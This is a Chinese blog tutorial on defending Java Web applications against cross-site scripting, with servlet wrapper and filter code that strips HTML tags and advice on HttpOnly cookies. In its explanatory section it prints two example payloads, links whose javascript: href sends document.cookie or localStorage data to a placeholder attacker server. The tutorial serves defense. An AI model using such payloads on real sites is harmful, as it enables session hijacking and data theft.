Java Web项目抵御跨站脚本攻击(前后端共御)

最新推荐文章于 2024-05-31 15:59:54 发布
最新推荐文章于 2024-05-31 15:59:54 发布
阅读量2.3k 收藏 5
点赞数 2
分类专栏: Java Web 文章标签: java javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Knightletter/article/details/121271068
版权

目录

1. XSS攻击原理

跨站脚本(XSS)攻击,指利用服务器漏洞将恶意代码以文本的形式混杂进请求数据中提交给服务器,服务器在未来渲染视图的时候会将该恶意代码也携带加载,客户端执行恶意脚本后会造成重要信息泄露。
XSS攻击的恶意代码通常是HTML标签包裹JavaScript脚本,形如<script>alert("恶意脚本")</script>,当页面中出现这种结构的文本时,浏览器会误认为是正常的标签而进行渲染。
例如,攻击者的服务器为xxx.xx.xxx.xx,它可以在超链接上裹挟脚本,通过存在漏洞的表单或者接口将此文本提交给服务器存储:

<a href=javascript:location.href="xxx.xx.xxx.xx?"+document.cookie.replaceAll("; ","&")>点我跳转</a>
<a href=javascript:location.href="xxx.xx.xxx.xx?abc="+window.localStorage.getItem("abc")>点我跳转</a>

其它用户触发该部分内容后会被流量劫持,进而将本地的Cookie和localStorage发送到了攻击者的服务器上。
在这里插入图片描述

2. 抵御思路

XSS攻击是利用了HTML标签转义上的漏洞实现代码注入的,所以抵御XSS的思路也应当从此入手。前端和服务端都有相应的职责来提升网站的安全性,不过数据最终是由服务端进行业务处理并持久化的,所以最终屏障应落在服务端上。

2.1 针对前端

在网站上动态渲染任意HTML元素是非常危险的,前端需谨慎书写会渲染HTML标签的操作行为,例如原生JS中的innerHTML属性、jQuery中的html()函数、Vue.js中的v-html指令,仅在可信的内容上使用,永远不要在用户提交的内容上采取这些动态渲染的操作
对于一些典型的表单和输入框提交逻辑,前端应在JS中完成初步校验,确保发送到服务端的数据具备基本的规范。

2.2 针对服务端

服务端应该站在“前端发送过来的数据极其不安全”的视角去处理,最大限度去过滤掉不规范的数据。因此,我们可以设置一个全局的过滤器,拦截所有用户请求,并将请求参数中所有的value值进行过滤(去掉HTML结构的文本上的标签,仅保留内容),例如文本<script>alert('恶意脚本')</script>最终会被转换为文本alert('恶意脚本'),因为失去了HTML结构,所以未来进行视图渲染时它不会被识别成JS代码。
在这里插入图片描述
此外,XSS攻击的一大重灾对象就是Cookie,Cookie的重要性不言而喻,它可能直接保存了用户的Session凭证,一旦泄露,攻击者就可以在不知道该用户账号密码的情况下虚拟该用户身份,不过好在Cookie可以在客户端上进行简单的安全设置:开启HttpOnly属性的Cookie条目将无法被JS获取,服务端只要确保返回给用户的Cookie信息中对该属性进行了设置即可。(Tomcat7、8已默认开启)

3. 代码实现

我们通过继承javax.servlet.http.HttpServletRequestWrapper来实现一个自定义装饰类,然后在该类中覆写获取请求参数的相关方法,这样便可以在不实现HttpServletRequest接口的情况下轻松的对请求方法进行增强。
获取到请求参数中的value串后,我们需要对其进行过滤,此处我们调用hutool工具包中的HtmlUtil.filter(String htmlContent)方法来去除文本中的HTML标签。

import cn.hutool.core.util.StrUtil;
import cn.hutool.http.HtmlUtil;
import cn.hutool.json.JSONUtil;

import javax.servlet.ReadListener;
import javax.servlet.ServletInputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletRequestWrapper;
import java.io.*;
import java.nio.charset.Charset;
import java.util.HashMap;
import java.util.LinkedHashMap;
import java.util.Map;

/**
 * 用于抵御XSS攻击的请求装饰器
 * StrUtil.hasEmpty用于判断是否为空字符串
 * HtmlUtil.filter用于过滤字符串中的HTML元素(去除标签,保留内容)
 */
public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {
    public XssHttpServletRequestWrapper(HttpServletRequest request) {
        super(request);
    }

    @Override
    public String getParameter(String name) {
        String value = super.getParameter(name);
        if (!StrUtil.hasEmpty(value)) {
            value = HtmlUtil.filter(value);
        }
        return value;
    }

    @Override
    public String[] getParameterValues(String name) {
        String[] values = super.getParameterValues(name);
        if (values != null) {
            for (int i = 0; i < values.length; i++) {
                String value = values[i];
                if (!StrUtil.hasEmpty(value)) {
                    value = HtmlUtil.filter(value);
                }
                values[i] = value;
            }
        }
        return values;
    }

    @Override
    public Map<String, String[]> getParameterMap() {
        Map<String, String[]> parameters = super.getParameterMap();
        LinkedHashMap<String, String[]> map = new LinkedHashMap<>();
        if (parameters != null) {
            for (String key : parameters.keySet()) {
                String[] values = parameters.get(key);
                if (values != null) {
                    for (int i = 0; i < values.length; i++) {
                        String value = values[i];
                        if (!StrUtil.hasEmpty(value)) {
                            value = HtmlUtil.filter(value);
                        }
                        values[i] = value;
                    }
                }
                map.put(key, values);
            }
        }
        return map;
    }

    @Override
    public String getHeader(String name) {
        String value = super.getHeader(name);
        if (!StrUtil.hasEmpty(value)) {
            value = HtmlUtil.filter(value);
        }
        return value;
    }

    @Override
    public ServletInputStream getInputStream() throws IOException {
        //将in流中的内容转换成成字符串body
        InputStream in = super.getInputStream();
        StringBuffer body = new StringBuffer();
        InputStreamReader reader = new InputStreamReader(in, Charset.forName("UTF-8"));
        BufferedReader buffer = new BufferedReader(reader);
        String line = buffer.readLine();
        while (line != null) {
            body.append(line);
            line = buffer.readLine();
        }
        buffer.close();
        reader.close();
        in.close();

        //将字符串body转换为map集合,然后将其中的字符串过滤,将结果转换为JSON格式的字符串
        Map<String, Object> map = JSONUtil.parseObj(body.toString());
        Map<String, Object> resultMap = new HashMap<>(map.size());
        for (String key : map.keySet()) {
            Object value = map.get(key);
            if (map.get(key) instanceof String) {
                resultMap.put(key, HtmlUtil.filter(value.toString()));
            } else {
                resultMap.put(key, value);
            }
        }
        String str = JSONUtil.toJsonStr(resultMap);
        final ByteArrayInputStream bain = new ByteArrayInputStream(str.getBytes());

        //返回一个ServletInputStream对象,将ByteArrayInputStream引入
        return new ServletInputStream() {
            @Override
            public boolean isFinished() {
                return false;
            }

            @Override
            public boolean isReady() {
                return false;
            }

            @Override
            public void setReadListener(ReadListener readListener) {

            }

            @Override
            public int read() throws IOException {
                return bain.read();
            }
        };
    }
}

最后我们只需注册一个全局过滤器,将一切HTTP请求交给我们封装的请求装饰类处理即可:

import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import java.io.IOException;

/**
 * 用于抵御XSS攻击的全局过滤器
 */
@WebFilter(urlPatterns = "/*")
public class XssFilter implements Filter {
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        Filter.super.init(filterConfig);
    }

    @Override
    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        XssHttpServletRequestWrapper wrapper = new XssHttpServletRequestWrapper((HttpServletRequest) servletRequest);
        filterChain.doFilter(wrapper,servletResponse);
    }

    @Override
    public void destroy() {
        Filter.super.destroy();
    }
}

对于返回给客户端的Cookie中的HttpOnly属性,只需调用Coookie.setHttpOnly(boolean isHttpOnly)方法即可进行设置。

啦啦啦小骑士
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
什么是跨站脚本 (XSS) 攻击?
简介
01-04 1977
这一次,教会xss攻击!!!!!!!
XSS脚本注入拦截框架 antisamy
04-06
XSS(跨站脚本)攻击是Web应用安全领域中一个常见的威胁,它通过注入恶意脚本到看似可信的网站上,进而对用户进行攻击。为有效防御XSS攻击,OWASP(开放Web应用安全项目)开发了名为AntiSamy的脚本注入拦截框架。...
Spring项目——抵御跨站脚本(XSS)攻击
Huisoul的博客
11-11 2506
一、概念介绍 1、XSS攻击的危害 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网 页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实 际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击 者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种 内容。 例如用户在发帖或者注册的时候,在文本框中输入 < script &gt
Java中的安全性问题,如跨站脚本攻击(XSS)和SQL注入等
编程小弟的博客
04-15 661
Java中的安全性问题涉及多个方面,包括跨站脚本攻击(Cross-Site Scripting,XSS)和SQL注入等。这些攻击都是由于程序在处理用户输入时未能有效过滤或转义恶意代码,导致攻击者能够插入并执行恶意脚本或命令。跨站脚本攻击是一种安全漏洞,攻击者可以在其中注入恶意脚本到网页中,当其他用户浏览该网页时,恶意脚本将在用户的浏览器中执行。这可能导致用户会话的劫持、隐私数据的泄露或其他恶意行为。在Java Web应用中,XSS攻击通常发生在以下几种情况:为了防止XSS攻击,开发者应该:SQL注入是一种攻
WEB攻防-JAVAWEB项目常见漏洞
最新发布
weixin_45534587的博客
05-31 888
1.JavaWeb常见安全及代码逻辑2.目录遍历&身份验证&逻辑&JWT3.访问控制&安全组件&越权&三方组件本篇主要了解以上问题在javaweb中的呈现,第一个重点理解URL与javaweb代码框架的对应方式,java在没有代码的情况下是很难渗透的,下面的内容也是针对白盒的第二个重点是JWT身份验证/攻击。
springboot抵御即跨站脚本(XSS)攻击
deng_zhihao692817的专栏
05-11 951
XSS攻击通常指的是通过利用网站系统保存系统的漏洞,通过巧妙的方法把恶意指令注入到网页,用户加载网页的时候会自动执行恶意脚本。2.在自己的com.xxx.filter.xss包新建类XssHttpServletRequestWrapper。如果客户能在你的浏览器执行javascript,那么就能窃取cookie或者token。7. 但是呢,同时也把html的标签也过滤掉了,我不想过滤掉html标签。3. 再建个XssFilter。4. 最后一步是在启动文件里加上。抵御即跨站脚本(XSS)攻击。
实战项目如何抵御即跨站脚本(XSS)攻击
一生烟雨的博客
12-04 1446
实战项目如何抵御即跨站脚本(XSS)攻击
SpringBoot 项目添加抵御跨站防御脚本(XSS)攻击功能
.
05-07 1362
一、XSS攻击 百度百科. XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 二、导入依赖库 因为Hutool工具包带有XSS转义的工具类,所以我们要导入Hutool,
Web攻防系列教程之跨站脚本攻击和防范技巧详解
Alan_Wdd的专栏
10-27 1157
摘要:XSS跨站脚本攻击一直都被认为是客户端Web安全中最主流的攻击方式。因为Web环境的复杂性以及XSS跨站脚本攻击的多变性,使得该类型攻击很难彻底解决。那么,XSS跨站脚本攻击具体攻击行为是什么,又该如何进行有效的防范呢?本文对此进行了有针对性的具体实例分析。XSS跨站脚本攻击一直都被认为是客户端Web安全中最主流的攻击方式。因为Web环境的复杂性以及XSS跨站脚本攻击的多变性,使得该类型攻击
XSS(跨站脚本攻击)原理详解(内含攻击实例)
qq_52642385的博客
07-05 6951
军锋真人cs野战123平台、xss平台(推荐自行搭建xss平台,不让别人白嫖咱自个的成果,蓝莲花战队的那个就挺好)、webshell箱子、postman、beef(kali上可能要自行下载,三行命令即可)、burpsuite、xsstrike【内含软件使用方法】原理:前端提交的一些参数转换为js代码,可以回显一些东西跨站:例如你将一段攻击代码通过留言存储到对方服务器上时,对方管理员在浏览时就可能会执行你所写的攻击语句。产生层面:前端函数类:一般应用js里面的一些输出类函数但是会受浏览器内核影响,一些浏览器会
XSS跨域攻击在web项目中的防范,基于antisamy技术
07-10
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,它允许恶意用户在Web应用程序中注入可执行的脚本代码。这些注入的脚本可能在其他用户的浏览器中执行,导致敏感数据泄露、会话劫持、钓鱼攻击等...
基于javajava项目源码在线相册系统.zip
05-27
- **XSS和CSRF防护**:使用防护库防止跨站脚本攻击和跨站请求伪造。 - **DDoS防御**:配合防火墙和云服务提供的DDoS防护,抵御大规模攻击。 - **数据备份与恢复**:定期备份数据库,确保数据安全,同时有灾备恢复...
基于PHP MySQL实现农产品特卖网站系统【优质毕业设计、课程设计项目】.zip
05-07
6. 安全性:项目需要考虑SQL注入、XSS(跨站脚本攻击)等网络安全问题。开发者应使用预编译语句或参数化查询来防止SQL注入,对用户输入进行过滤和验证,以抵御XSS攻击。 7. 配置环境:项目提供了配置环境说明,帮助...
基于JAVA的安全电子商务.zip
03-26
同时,对输入数据进行过滤和转义,以及使用Content Security Policy(CSP)可抵御跨站脚本(XSS)攻击。 8. **Spring Security框架**:Spring Security是Java生态系统中广泛使用的安全框架,它提供了身份验证、授权、...
解决Intellij IDEA配置Maven速度缓慢的问题
啦啦啦小骑士的博客
09-21 9669
原因简述 Intellij IDEA自带了Maven支持(当前版本为3.6.1),用户无需单独安装Apache Maven就可以直接创建Maven项目。无论是IDEA自带的Maven还是Apache官网下载的Maven,默认都是从国外的仓库下载依赖文件,首次启动下载速度较慢,有时甚至会超时。本教程记录整个Maven的下载和配置过程,并将采用阿里云提供的镜像地址加快下载速度。 操作步骤 一、下载并...
Intellij IDEA导入Eclipse/Maven项目
啦啦啦小骑士的博客
09-23 2827
一、导入Eclipse项目 ①点击Import Project(导入工程),选中你要导入的工程文件夹,选择Import project from external model(导入外部模型)中的Eclipse ②一路点击next,IDEA会检测出Web框架(web.xml),选择Configure后确定即可 ③打开Project Sturcture选项卡,选择Modules,将所有标红的依赖...
使用SpringBoot集成的JavaMailSender进行异步邮件发送
啦啦啦小骑士的博客
02-03 1508
一、背景 邮件发送功能是各种系统不可或缺的功能,例如办公系统会在出现特定状况时向人事部门或技术部门发送告警信息。 Spring框架提供了JavaMailSender接口可以进行简单的邮件推送,我们可以很轻易的使用。此外,邮件推送还需要考虑是否采用异步的方式,如果邮件推送功能是在用户触发某个操作后发生的,使用同步的方式串行执行发邮任务势必会导致业务的阻塞,我们可以使用Spring提供的ThreadPool来实现异步多线程。 二、配置异步任务 首先在SpringBootApplication主类下增加注解@
开启SpringMVC编码过滤器后,HTML反而出现乱码的解决方案
啦啦啦小骑士的博客
09-03 1137
现象: HTML等静态资源本身的编码是没有问题的,但在开启SpringMVC的编码过滤器后,页面反而出现了莫名其妙的乱码。 原先的web.xml配置如下: <filter> <filter-name>CharacterEncodingFilter</filter-name> <filter-class>org.springframework.web.filter.CharacterEncodingFilter</filter-class&
Web安全深度解析:跨站脚本攻击的危害与防御策略
"这篇资源详细介绍了跨站脚本攻击(XSS)的危害以及Web攻击与防御技术,涵盖了Web安全的多个方面,包括Web服务器和客户端的安全考虑。" 在互联网普及和Web技术快速发展的背景下,Web安全变得越来越重要。跨站脚本攻击...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值